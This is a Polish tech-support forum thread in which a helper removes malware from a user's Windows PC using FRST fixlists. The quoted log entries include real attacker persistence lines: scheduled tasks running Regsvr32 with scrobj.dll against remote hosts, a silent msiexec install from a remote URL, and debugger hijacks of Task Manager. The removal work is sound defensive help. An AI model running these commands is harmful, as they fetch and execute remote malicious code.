Witamy na forum PC Format Zapraszamy do REJESTRACJI


Użytkownicy przeglądający ten wątek: 1 gości

[FRST] Prośba o analizę logów

#1
[FRST] Prośba o analizę logów
Cześć,

Od kilku dni Avast powiadamia o zablokowanych działaniach podczas uruchamiania/uzywania przeglądarki internetowej. Skanowanie i czyszczenie AdwCleanerem nie pomaga. Proszę o analizę logów:

AdwCleaner]
AdwCleaner[C2]: http://wklej.org/id/3118767/
AdwCleaner[S1]: http://wklej.org/id/3118768/

[FRST]
Addition: http://wklejto.pl/282749
FRST: http://wklejto.pl/282748

Dzięki.
 System operacyjny: windows_eight Przeglądarka: chrome
#2
RE: [FRST] Prośba o analizę logów
Logi FRST są zniekształcone - na "wklejto" trzeba wklejać tekst, a nie plik.
Popraw to.
I mają być trzy logi: FRST.txt, Addituion.txt, Shortcut.txt.

Infekcja jest widoczna, ale nie da się zrobić "fixlist" ze zniekształconych logów.

Odinstaluj niepotrzebny do niczego Akamai NetSession Interface
.
 System operacyjny: windows_seven Przeglądarka: seamonkey
#3
RE: [FRST] Prośba o analizę logów
Poprawione logi poniżej:

[FRST]
Addition: http://wklej.org/id/3118942/
Shortcut: http://wklejto.pl/282760
FRST:  http://wklej.org/id/3118940/
 System operacyjny: windows_eight Przeglądarka: chrome
#4
RE: [FRST] Prośba o analizę logów
Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:
Cytat:RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Program Files (x86)\Eastness
RemoveDirectory: C:\Program Files (x86)\MIO
FirewallRules: [{4EA39275-1076-4685-9D24-F84A787F2012}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{1D85BD27-CF6B-4A1A-843D-878A0A0533B2}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{F6A14A9D-F339-4DCA-BAF4-2D6E55178221}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe
FirewallRules: [TCP Query User{961A343B-C4BE-416A-9884-B57F1DE071D8}C:\users\kmitoff-lap\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\kmitoff-lap\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{27E70064-AB07-4989-B07E-9E61304387DC}C:\users\kmitoff-lap\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\kmitoff-lap\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{77DC31CB-24D6-4193-BC35-A39868C155EA}C:\users\kmitoff-lap\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\kmitoff-lap\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{9C68B7C0-CFC6-4FA2-84B5-4FAD84CCFDC1}C:\users\kmitoff-lap\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\kmitoff-lap\appdata\local\akamai\netsession_win.exe
C:\users\kmitoff-lap\appdata\local\akamai\netsession_win.exe
Task: {EB635D08-8BE9-45CA-A5F3-844EC5A0816E} - System32\Tasks\{0ACF9A7F-6035-40E0-B4D6-4303081986E6} => pcalua.exe -a "C:\Program Files\Autodesk\Advance Steel 2015\Setup\Setup.exe" -c /P {6005A111-AD7B-0415-BD18-071F007063CF} /M AdvanceSteel /LANG pl-PL
Task: {F5F1156A-76C6-4B07-8E8D-1A54B7B7CBE8} - System32\Tasks\{51C6006A-6EF9-40E2-AD79-776FCF8DD2D0} => pcalua.exe -a "C:\Program Files\Autodesk\DWG TrueView 2015 - English\Setup\Setup.exe" -c /P {5783F2D7-E028-0409-0100-0060B0CE6BBA} /M AOEM /language en-US
Task: {D84E5D4A-FF08-48D0-9F7F-B71222757C0E} - System32\Tasks\{EBD5C3F2-88AB-481D-9ECA-F75C2D63A411} => pcalua.exe -a "C:\Program Files\Autodesk\AutoCAD 2012 - English\Setup\Setup.exe" -c /P {5783F2D7-A001-0409-0102-0060B0CE6BBA} /M ACAD /language en-US
Task: {82E9EE62-542D-4B0C-81B7-21C1603F7112} - \Milimili -> Brak pliku <==== UWAGA
Task: {50FD94E3-F127-46D6-AD3B-FFBA18BF3FD9} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj85Mjk1OUU5MYI5FkJSOTExNkQSF8JQOTMdRWF5MYI4MF== scrobj.dll
Task: {4702332F-B6BC-466E-8B3D-5DBB9BB4B459} - System32\Tasks\{6BC55BC8-3A97-4CD5-8112-EF9BCB303F49} => pcalua.exe -a "C:\Program Files\Autodesk\Advance Steel 2015\Setup\Setup.exe" -c /P {6005A111-AD7B-0415-BD18-071F007063CF} /M AdvanceSteel /LANG pl-PL
Task: {270B6C3A-07DC-49EB-A43B-9BAEA46C7137} - System32\Tasks\{638372F0-30BA-47AF-A764-C0B58BEACC79} => pcalua.exe -a "D:\Program Files\Autodesk\Autodesk Robot Structural Analysis Professional 2015\Setup\Setup.exe" -c /P {3490656B-EAD3-467A-87BB-FE4C54F6C9E7} /M RSAPRO2015x64 /LANG pl-PL
Task: {2FC28748-3392-4607-BFEB-A2BCFA3084AF} - System32\Tasks\{B6CA4C66-5FBF-44A7-8F3C-6904ED4B9C98} => pcalua.exe -a "C:\Program Files\Autodesk\AutoCAD 2013\ASD\Setup\pl-PL\Setup\Setup.exe" -c /P {5783F2D7-B030-0000-0102-0060B0CE6BBA} /M ASD /language pl-PL
Task: {01D2D2AB-F256-4A20-961F-1B4D995C5BE5} - System32\Tasks\{3DE157BC-9F98-4A3D-8C19-A7D4E07E1BAB} => pcalua.exe -a "C:\Program Files\Autodesk\AutoCAD 2013\ASD\Setup\pl-PL\Setup\Setup.exe" -c /P {5783F2D7-B030-0000-0102-0060B0CE6BBA} /M ASD /language pl-PL
Task: {0B1FC664-41C8-45B7-B0E8-6B6FE93B73DC} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj85Mjk1OUU5MYI5FkJSOTExNkQSF8JQOTMdRWF5MYI4MF== scrobj.dll
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{FD51ED8A-D518-4554-B236-B6E9D234FD03}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{FE054BB2-AF94-40AC-88AA-2F59F7018B1D}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{FE317223-8EDE-4684-B424-E48B9EA90220}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{FE718E8F-C3AA-4F30-9103-432450CF1DA1}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{EF01D98A-747B-4522-AD70-991B90855DBF}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{F196F03F-651A-43AF-BE34-D11942F24445}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{F2DB0EE3-7137-4CB0-8349-483C4FF2143A}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{F40E2FF0-4D77-40B2-9A44-A3AEECCE8EFF}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{F5522F0C-962A-48AC-9992-E81B07628F1F}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{F78DCF7C-043D-45FC-9D21-676FC307BA3F}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{F868EAEC-1B73-4F5E-BA73-90EBA94E75BE}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{FA97F7A7-FD19-4D55-ABF2-CFEFFF777426}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{E9C07CEC-7B82-49E4-BBA2-7533B88E9D64}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{EA34A0C0-5CE7-4701-A6FA-117D25CD5EBB}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{E4222C78-3670-4BB1-9AD4-7D8F3E581F2D}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{E70DE962-842A-4488-9481-1D0FD72A020F}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{794199C5-827C-41C8-8CB2-3A1EA056AF5E}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{798391FE-4AF2-4851-9DDA-1F0D70C02A9E}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{7C239DAB-BC87-45F3-B7B1-FCC1541A235B}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{834CE679-2E47-49DE-9E41-FEC87E9192EB}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{849AFB5B-D6C9-4924-A712-F7118FF9611F}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{85452F88-5071-492E-B850-2E3C586DCBD8}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{87F5CF8F-A06D-498F-A05F-E520E6B570DB}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{89F0FC31-3B1D-494B-A75B-6BD4FA527B8A}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{8AA16DFC-DFC6-4B51-8FA2-A5D812BE33BF}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{8ED07FEF-E1B0-4CC3-B2BA-D354828AB952}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{988F4102-E6E3-4282-ACAC-55270827F2A8}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{9906CDFC-DB2C-4126-9422-13139B148495}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{9A21C6C5-27FC-4442-8590-575E7AFD73BB}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{9ECF83FB-23C5-43B6-83DE-93CFBDD74D4A}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{A58F47CC-FF65-4152-B0B1-666C643A5BFC}\InprocServer32 -> AcETransmit.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{A6A3D586-44CF-44C2-A92C-620BB713B4F2}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{ABBE3F83-D585-4A50-9B69-198B0F566F2E}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{AC5CECFA-F03A-41D2-A89C-704C44935941}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{B1560245-190E-4BBD-81DF-9B642D0E5325}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{B2A579E0-A797-40B1-8AEE-A8F6404719F8}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{B47196BC-D4AB-41BB-A771-543D67CFC9F5}\InprocServer32 -> AcETransmit.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{B53CEF4B-1A13-49DE-BBC5-A7100FB2F38C}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{B5EE2B68-9A23-4BCD-BB77-FEA6DFB24DD6}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{B80687F9-FA4C-4735-9DC4-E5715F2BC698}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{BAE5802A-CF21-4F9C-AE04-D98F4036AC31}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{BBF6A206-CB04-479D-96AE-349E1E83319A}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{BC71DEA1-D6FB-48B8-AB06-D151C81BBCDD}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{BF224DC3-B602-4EEE-BFE9-9E4E0AED6837}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{BF4CC07E-E9BB-40D6-873F-855B211033B9}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{C061C82C-D041-4214-BB07-B608107CEFCB}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{C2D4ACCC-A3D1-4A0A-AD59-0DD8BA3D5EE1}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{C8C18F89-794D-466B-8B97-95634D9890EF}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{C8EC7647-1E79-4F13-81D7-2EED803D0D22}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{CC23CA32-9892-4FBA-A108-FE31CA0F35A6}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{CD865713-70D6-4E15-BB7B-9B99AD9DEB85}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{D56F5AB3-9C4D-4F1A-A851-A671D9FE8C22}\InprocServer32 -> AcETransmit.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{D66873EA-AAE5-41CC-8DD2-8CE3228E9F89}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{D86B6C47-11F2-4D95-B635-EA575F0892FC}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{DB207560-8449-4FAF-BDC2-61676EB012D4}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{DE74F5AD-DA2F-429F-BAF9-850A2808D585}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{DF6525C2-6358-4B07-813D-708120C5FE1A}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{E177A457-9EAA-43C3-A3CE-84874A28F6CA}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{E29F6C45-6927-4508-8F3F-34105FD3FC5F}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{5544903C-2CCC-487C-91BB-F310B72A8E9B}\InprocServer32 -> AcETransmit.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{59A224A2-BEF8-4C89-96E0-83A5411ABB6C}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{622F6193-E4DD-46E6-BC66-2ED88E9FD28D}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{6451051B-AD22-4C6A-ACCE-013A0E1DDBC3}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{64B99FDB-1D85-447F-98C7-569DBDA723DB}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{6BCE6F6E-C050-4F39-BD98-E2743949F724}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{6F56D7C9-18DD-4C15-9FA8-C54E3610EC40}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{70DBCAE8-8C2B-450C-9E1D-43E4686C6512}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{713C0E8A-5AE8-4695-B442-5ED6C4FE5C42}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{7293E009-3015-4AD3-96EC-D42C36B5FCE3}\InprocServer32 -> AcETransmit.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{72EFC580-D085-4B81-8C55-26A79E445338}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{750AEC19-2E4C-4ED9-9B9F-F9CAFCD060F3}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{3497C2EC-5684-4B21-AF74-F6760E0221DC}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{38C8B14E-7879-4DA9-8C3F-8CAAC359293A}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{3FCEB42C-9B98-486A-BED7-FD7F3ADB7291}\InprocServer32 -> AcETransmit.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{40770568-0D5E-49D4-BE47-BC47A4F0B0A4}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{44A52280-AE56-490D-890C-89FB7279ED6B}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{46C56738-39C6-4240-8B9B-008CCD769A84}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{47179DDE-10AC-4737-97C9-8CE5379343EA}\InprocServer32 -> AcETransmit.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{475C7B4A-6964-4F9E-9708-05A16EAC31D0}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{48270F9E-CCF6-4C79-B6FF-267C960E6425}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{48FEFCD7-5D7C-4E4A-9F11-60E69A31D4B1}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{49998808-648A-4A9C-A7A5-B1672775D9AB}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{4A756F5F-CBA4-428B-B17F-AF80C0C8502D}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{4B40437B-8972-4444-BBE3-1588FF55F203}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{4BD03680-3C0F-4501-AFF7-3D008586917F}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{162EF0A1-5A33-46F2-ACCF-CA388B084A09}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{1D625598-C876-4C51-8EF5-F9D8F96F62AA}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{1D6DFD6A-9E16-435A-9327-6FFEC6BA372F}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{1E5724EA-3423-4BD3-ABD6-46E650D2DC66}\InprocServer32 -> AcETransmit.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{1E8A29BA-827D-4031-A4A3-AE7999B402F6}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{1EA072EE-57FD-495E-889C-8243C3BDBDBC}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{1FD7F53F-7ED5-439C-9A77-A3821CD09E98}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{20E47D5B-529A-45BD-8E77-BF1A3064A008}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{2709544A-5B24-4F9F-A5DA-CEC7297D3A4E}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{2BCA857B-A18B-4AFA-B183-CC0E49C12058}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{2C74F89E-7421-46B4-BA54-F86F1BD9F237}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{2C7D1157-7D50-4A88-9777-5EBBA3189AB8}\InprocServer32 -> axdb.dll => Brak pliku
2017-04-26 09:35 - 2017-04-20 17:18 - 00000000 _____ C:\Windows\SysWOW64\22
2017-04-26 09:35 - 2017-04-20 17:18 - 00000000 _____ C:\Windows\SysWOW64\11
2017-04-26 09:30 - 2017-04-26 09:34 - 00000000 ____D C:\Program Files (x86)\BiaoJi
S3 andnetndis; \SystemRoot\system32\DRIVERS\lgandnetndis64.sys [X]
S3 VBoxNetFlt; \SystemRoot\system32\DRIVERS\VBoxNetFlt.sys [X]
S3 vdbus; \SystemRoot\System32\drivers\vdbus.sys [X]
CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=1492584197&z=7d6f4b810626ca4259c0a48g2z1t3odwdb7zag1t6w&from=che0812&uid=ST1000LM024XHN-M101MBB_S2U5J9AD201299
FF Plugin-x32: Atfoxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [Brak pliku]
FF Plugin-x32: Atfoxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [Brak pliku]
FF Plugin-x32: Atfoxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [Brak pliku]
FF Plugin-x32: Atfoxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [Brak pliku]
Toolbar: HKU\S-1-5-21-314960276-2723476446-2752971181-1001 -> Brak nazwy - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Brak pliku
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA
GroupPolicy: Ograniczenia <======= UWAGA
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\taskmgr.exe: [Debugger]
HKU\S-1-5-21-314960276-2723476446-2752971181-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zD...RWF5MYI4MF== /q
HKU\S-1-5-21-314960276-2723476446-2752971181-1001\...\Policies\Explorer: []
HKU\S-1-5-21-314960276-2723476446-2752971181-1001\...\Run: [BingSvc] => C:\Users\kmitoff-lap\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2016-07-06] (© 2015 Microsoft Corporation)
C:\Users\kmitoff-lap\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
EmptyTemp:
Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

Zrób nowe logi FRST.

Napisz, jaka sytuacja po tym usuwaniu?
 System operacyjny: windows_seven Przeglądarka: seamonkey
#5
RE: [FRST] Prośba o analizę logów
Logi po naprawie:

Addition: http://wklej.org/id/3119111/
Shortcut: http://www.wklejto.pl/282782
FRST: http://www.wklejto.pl/282779

Wydaje mi się, że shortcut jest zniekształcony przy wrzucaniu na wklejto. Na wklej.org jest ta sama sytuacja.

Link do dropbox https://www.dropbox.com/sh/9431hqqxlccmu...0Fqsa?dl=0

Po naprawie nie zauważyłem żadnych niepokojących objawów.
 System operacyjny: windows_eight Przeglądarka: chrome
#6
RE: [FRST] Prośba o analizę logów
Cytat:CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=1492584197&z=7d6f4b810626ca4259c0a48g2z1t3odwdb7zag1t6w&from=che0812&uid=ST1000LM024XHN-M101MBB_S2U5J9AD201299
Uruchom Google Chrome

> Naciśnij klawisze: lewy Alt+F i kliknij przycisk Ustawienia >
> Sekcja: Po uruchomieniu > wybierz: Otwórz konkretną stronę lub zestaw stron >
> Kliknij: Wybierz strony >
> Usuń: ourluckysites.com, wpisz nowy adres strony głównej i kliknij przycisk OK.

Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

Cytat:CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{0215A4C0-5431-4FD0-9B06-46589B5C4939}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{048ED0E0-12CF-4C0F-9FFA-947C2FBE8C8E}\InprocServer32 -> axdb.dll => Brak pliku
